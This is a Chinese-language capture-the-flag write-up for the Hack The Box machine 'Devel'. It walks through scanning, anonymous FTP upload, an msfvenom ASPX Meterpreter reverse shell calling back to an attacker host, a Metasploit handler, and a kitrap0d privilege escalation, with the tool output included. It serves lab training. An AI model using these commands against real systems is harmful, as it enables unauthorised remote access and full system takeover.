HTB-Devel

Devel

第一步：扫描网络

nmap -sV -O -F --version-light 10.10.10.5

端口21：文件传输协议FTP控制命令，是一个微软的ftpd
端口80：超文本传输协议（HTTP），这是一个iis服务器

第二步：攻击FTP

检查ftp
ftp 10.10.10.5
是可以匿名登录

尝试写入文件
put flag.html
echo “H0ne” > flag.html
ls -a 可以看到文件
浏览器访问10.10.10.5/flag.html 是可以看到H0ne的

第三步：创建/上传.aspx外壳

使用MSFvenom进行漏洞利用
MSFvenom 是一个有效载荷生成器，
我们需要创建一个反向shell，这是一种目标机器与攻击机器通信的shell，攻击机器有一个监听端口，它接收连接，通过使用代码或命令执行来实现

反向tcp外壳应该适用于windows，我们将使用meterpreter
Meterpreter 是一种先进的、可动态扩展的有效负载，它使用内存中的DLL 注入阶段，并在运行时通过网络进行扩展。它通过 stager 套接字进行通信并提供全面的客户端 Ruby API。它具有命令历史记录、选项卡补全、通道等功能。

asp Meterpreter 反向TCP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.15 LPORT=8080 -f aspx -o shell.aspx

-p :使用的有效载荷
-f：输出格式
-o：将有效负载保存到文件中
LHOST：本地主机
LPORT：本地端口
重新连接FTP
put上传本地文件

第四步：建立反向shell连接

使用metasploit
msfconsole 启动
search windows/meterpreter/reverse_tcp

use exploit/multi/handler
用这个命令设置有效的负载处理程序
show options

设置payload
set payload windows/meterpreter/reverse_tcp

设置LHOST LPORT

都设置好了 ，然后run

sysinfo 查看配置信息

访问文件发现权限不够，这就需要提权

第五步：权限提升

background 回到攻击前
寻找服务器上的漏洞
use post/multi/recon/local_exploit_suggester

meterpreter > background
[*] Backgrounding session 2...
msf5 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf5 post(multi/recon/local_exploit_suggester) > set session 2
session => 2
msf5 post(multi/recon/local_exploit_suggester) > run

[*] 10.10.10.5 - Collecting local exploits for x86/windows...
[*] 10.10.10.5 - 29 exploit checks are being tried...
[+] 10.10.10.5 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms10_015_kitrap0d: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms15_004_tswbproxy: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms16_016_webdav: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed

exploit ms10_015_kitrap0d，
这是本地提权的exploit。
use exploit/windows/local/ms10_015_kitrap0d
在我退出之前，用 sessions -i查看我的进程 呢些没有结束

最后就是寻找flag了 就不演示了